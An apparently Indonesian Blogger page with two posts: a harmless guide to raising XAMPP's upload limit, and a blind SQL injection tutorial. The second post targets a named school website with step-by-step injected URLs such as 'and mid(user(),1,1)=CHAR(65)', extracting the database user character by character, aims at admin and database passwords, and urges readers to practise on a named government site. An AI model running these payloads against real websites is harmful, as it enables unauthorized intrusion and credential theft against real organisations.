Recent Comments

FBS FOREX

Forex Broker Untuk Pemula

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Space For Ads

Space For Ads
Tampilkan postingan dengan label Sql. Tampilkan semua postingan
Tampilkan postingan dengan label Sql. Tampilkan semua postingan

Minggu, 25 Januari 2015

Cara meningkatkan kuota import dan eksport di xampp


Haloo.. selamat pagi menjelang subuh kawan2 :D.. hyuhh.. hari ini saya akan share pengalaman saya dalam mencari-cari cara import atau ekspor database.. eh btw udah bisa instal xampp ny belum? kl belum bisa di baca panduan ny di sini , lanjuutt.. kan kadang kita tidak bisa import atau ekspor database dalam jumlah besar.. karena xampp melakukan pembatasan maksimal yaitu 2mb.. kecil y.. setelah baca panduan sana ini akhirnya bisa juga digedein kapasitas nya.. yuk langsung aja.. enggak susah kok..


Pertama.. jika xampp kawan-kawan masih dalam kondisi on.. matiin duluu.. di "stop" ya.. jangan di "close" agar memastikan konfigurasi ny berjalan lancar..





nah.. masuk ke window explorer.. cara ny? (tombol wins+e) atau klik kanan di start menu kemudian pilih open windows explorer.. nah kl udah cari di drive c ,masuk ke C:\xampp\php lalu cari file php.ini dobel klik aja..




okeeee.. nah setelah di dobel klik file php.ini akan muncul notepad seperti gambar di samping, oke.. cari tulisan "upload".. wakwkakwka.. pusing kan scroll naek turun.. xD.. gampang tekan (alt+f) terus ketik upload di kolom search.. terus enter..enter..jangan entar.. kapan ketemu ny.. wakwkawk..







nah okee.. kl ud ketemu cari tulisan "upload_max_filesize=2M" seperti gambar di samping.. terus ganti angka 2 ny jadi terserah.. 10 misalnya.. kl saat bikin tutorial ini aku bikin jadi 10.. kl kebanyakan takut meledak.. wkawkakw.. eh g tau juga ding kl kegedean apa efek ny.. nah kl udah save.. (ctrl+S)







kl uda di save.. on kan xampp ny.. terus masuk browser ketik.. localhost/phpmyadmin terus enter..bukan entar..wakwka.. nah masuk di tab import.. taraaa.. kapasitas ny bertambah.. ahhahaha.. udah.. gitu aja tutorial ny.. gampang kan..




nah.. selesei..selamat menikmati.. kl ad pertanyaan silahkan y.. kita sharing2 .. bye..bye.. *cling*

Jumat, 01 November 2013

Blind SQL

BLIND SQL INJECTION
 buat temen2 yg belum tau apa itu SQL-Injection bisa di baca2 dulu di sini.. monggoo


kembali lagi akh.. wkwkwkwk..

mari kita membahas tentang Blind SQL Injection..

Apa sich Blind SQL Injection tu?

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

okey sampe sini aja ah..cape ngetik..wkwkwkw

slamat mencoba..


buat latihan>> www.dkp.go.id/content.php?c=5161 (ingat woi, web negara inii wkwkwk)

Smoga Bermanfaat..